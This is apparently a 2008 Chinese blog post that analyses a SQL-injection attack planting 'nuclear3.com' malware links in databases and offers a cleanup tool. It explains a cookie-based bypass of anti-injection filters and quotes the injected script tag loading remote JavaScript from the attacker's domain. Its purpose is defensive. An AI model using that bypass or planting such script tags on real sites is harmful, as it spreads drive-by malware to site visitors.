数据库挂马修复工具及nuclear3.com挂马分析

一不小心数据库被挂了码,又没有及时做备份,只要一个一个表的恢复,现在加功能整理到这个小软件里,希望能方便大家。

nuclear3.com挂马分析

通常的防注入程序只对 request.form 和 request.querystring 做了检查过滤,

当代码中存在request("userid")时,request自动一次访问form querystring cookies,

这个时候黑客通过伪造的cookies绕过通常的过滤执行了挂马。

通过cookies提交的内容如下

 

  221.130.*.*  2008-12-19 3:29:26  /s*_*.asp  Cookie  id 

Code

通过cast函数转后的语句为

CaSt

Code

其中<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>不断变化,甚至多次被注入,无法通过简单的替换一次清理干净。

最好通过正则表达式替换。

 

 

数据库挂马修复工具

说明:
1将数据库备份在本地的还原进行修复
*注意一定做好备份工作
*本地修复性能较好
*没有多台机器,建议使用虚拟机vmware
2此程序运行需要dotnet framework 2.0
支持 sql2000 sql2005
3设置数据库连接,需要使用sa用户,修复过程中使用正则表达,需要管理员权限。
4  ntext数据类型的字符串不能再直接替换,请选择ntext修复,通过设置陪需分段修复,建议之小于5000
分批处理每次不超过1000

5 普通修中注意主键字段的填写,一般为int类型。
6 普通修复暂时没有没有分段修复功能,数据最好不要超过10W

发布记录
v0.12 内部邀请测试,细节有待改善,性能有待改进


联系我:cnhefang@gmail.com

错误信息最好截图

 

下载地址:

https://files.cnblogs.com/cnhefang/sqlfixer.rar

 

 

转载须指明出处

posted on 2008-12-19 19:18  漂泊的小强  阅读(1095)  评论(5编辑  收藏  举报

导航